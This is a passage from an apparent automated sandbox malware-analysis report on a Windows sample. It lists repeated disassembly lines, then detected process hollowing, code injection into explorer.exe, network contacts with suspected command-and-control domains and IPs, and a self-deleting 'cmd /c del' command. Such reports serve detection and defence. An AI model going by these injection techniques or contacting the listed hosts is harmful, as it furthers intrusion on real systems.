          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ADFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ADFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ADD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 92.222.235.170 80
          Source: C:\Windows\explorer.exeDomain query: www.vzn2aai2qj.icu
          Source: C:\Windows\explorer.exeDomain query: www.shitcoin.team
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeDomain query: www.deutscheno1.com
          Source: C:\Windows\explorer.exeDomain query: www.bettingweb365.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.34.104 80
          Source: C:\Windows\explorer.exeDomain query: www.marymarinho.com
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1110000
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: unknown protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: unknown protection: read write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 72B008
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4704
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4104
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000F.00000000.363485956.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.476695178.0000000003CAA000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.491601749.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.496451134.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.603770655.0000000005C80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.603327342.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.481128035.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.484507858.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.484893094.000000000538B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.483030565.000000000538B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.486355986.000000000538B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.486172861.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.483630102.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.491601749.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.501345800.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.480718352.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.496451134.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.496076113.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.491362805.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.482558065.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.603770655.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.481290404.0000000005389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000001E.00000000.489397348.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.601570857.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.494616326.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.499065146.0000000000EF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanb
